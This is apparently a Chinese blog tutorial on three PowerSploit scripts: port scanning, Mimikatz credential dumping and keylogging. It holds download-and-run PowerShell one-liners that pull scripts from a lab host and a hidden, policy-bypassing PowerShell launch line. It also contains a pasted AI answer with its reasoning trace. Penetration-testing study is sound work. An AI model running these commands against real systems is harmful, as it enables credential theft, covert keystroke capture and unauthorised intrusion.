Invoke-Portscan、Invoke-Mimikatz、Get-Keystrokes

本文介绍了PowerSploit中的三个关键脚本:Invoke-Portscan用于端口扫描,Invoke-Mimikatz用于获取系统凭据,而Get-Keystrokes则用于键盘记录。这些脚本在网络安全和渗透测试中具有重要作用。通过下载并执行这些脚本,可以模拟攻击行为,以检查系统安全性和防御能力。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、Invoke-Portscan

Recon 模块的一个脚本,主要用于端口扫描

1.下载脚本

IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Recon/Invoke-Portscan.ps1")

2.扫描

Invoke-Portscan -Hosts 192.168.110.130, 192.168.110.142 -Ports "80,22,4444"

二、Invoke-Mimikatz

Exfiltration 模块的脚本,获取 Hash

1.下载

IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1")

2.执行,需要管理员权限

Invoke-Mimikatz -DumpCreds

三、Get-Keystrokes

Exfiltration 模块的脚本,用于键盘记录,功能强大;不仅键盘输入记录,甚至能记录鼠标的点击情况,还能记录详细的时间,实战可以直接放入后台运行

1.下载

IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Exfiltration/Get-Keystrokes.ps1")

2.开启键盘记录

Get-Keystrokes -LogPath c:\win-test\write.txt

3.随意输入,如 “i want to try”

 

 

<think>嗯,用户想知道怎么用PowerSploit里的Invoke-Portscan.ps1脚本进行端口扫描。首先,我需要回忆一下这个脚本的基本用法,可能还要参考提供的引用内容。引用[1]里提到了两条指令,一个是下载脚本,另一个是执行扫描,参数是-hosts和-ports。 用户需要具体的命令行参数示例,尤其是Hosts和Ports的更新。首先应该确认如何正确加载脚本,可能需要用IEX命令从远程下载。然后,参数部分,hosts可以是单个IP、多个逗号分隔的IP,或者CIDR格式,比如192.168.1.0/24。Ports参数可以是逗号分隔的端口列表,或者范围比如1-1024。 然后,用户可能想知道更详细的参数,比如扫描类型(-ScanType),比如TCP、UDP或者SYN扫描,但引用中没有提到,可能需要结合常识补充。另外,线程数(-Threads)可能影响扫描速度,但默认值是多少呢?可能默认是100,但不确定,可能需要建议用户测试调整。 还要注意PowerShell的执行策略问题,用户可能需要绕过限制,比如使用-exec bypass,如引用[5]中的命令。另外,执行脚本可能需要先导入模块,或者直接调用。 可能还需要提醒用户权限问题,SYN扫描需要管理员权限,这点在引用里没提到,但属于常见问题。最后,给出完整的示例命令,确保用户能够复制粘贴使用,并验证结果是否正确。 另外,用户的问题可能涉及到网络安全或渗透测试,需要强调合法使用,避免法律问题。但回答中可能不需要提到这点,除非用户特别询问。 总结回答的结构:加载脚本的方法,参数详解(hosts、ports、scantype、threads),完整示例,注意事项,相关引用。然后生成相关问题,比如如何绕过执行策略,其他扫描类型,或者处理防火墙干扰。</think>### PowerSploit Invoke-Portscan.ps1 使用方法详解 #### 1. **加载脚本** 首先需通过PowerShell下载并加载脚本(需管理员权限): ```powershell iex (New-Object Net.WebClient).DownloadString("http://<Your_Server_IP>/PowerSploit/Recon/Invoke-Portscan.ps1") ``` (将`<Your_Server_IP>`替换为存放脚本的服务器地址)[^1] #### 2. **核心参数说明** - **`-Hosts`** 支持格式:单个IP、逗号分隔的多个IP或CIDR网段。 示例: ```powershell -Hosts "192.168.1.7" -Hosts "192.168.1.7,192.168.1.10" -Hosts "192.168.1.0/24" ``` - **`-Ports`** 支持格式:逗号分隔的端口列表或范围。 示例: ```powershell -Ports "80,22,3389" -Ports "1-1024" # 扫描1到1024端口 ``` - **`-ScanType`** 可选扫描类型:`TCP`(默认)、`UDP`、`SYN`(需管理员权限)。 示例: ```powershell -ScanType "SYN" ``` - **`-Threads`** 控制并发线程数(默认100),影响扫描速度。 示例: ```powershell -Threads 200 ``` #### 3. **完整示例命令** ```powershell Invoke-Portscan -Hosts "192.168.1.7,192.168.1.10" -Ports "80,22,445,1-1000" -ScanType "TCP" -Threads 150 ``` #### 4. **注意事项** - **权限要求**:`SYN`扫描需管理员权限,`UDP`扫描可能被防火墙拦截[^4]。 - **绕过执行策略**:若遇权限问题,可添加参数: ```powershell powershell.exe -exec bypass -W hidden -nop [命令] ``` 参考示例[^5]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值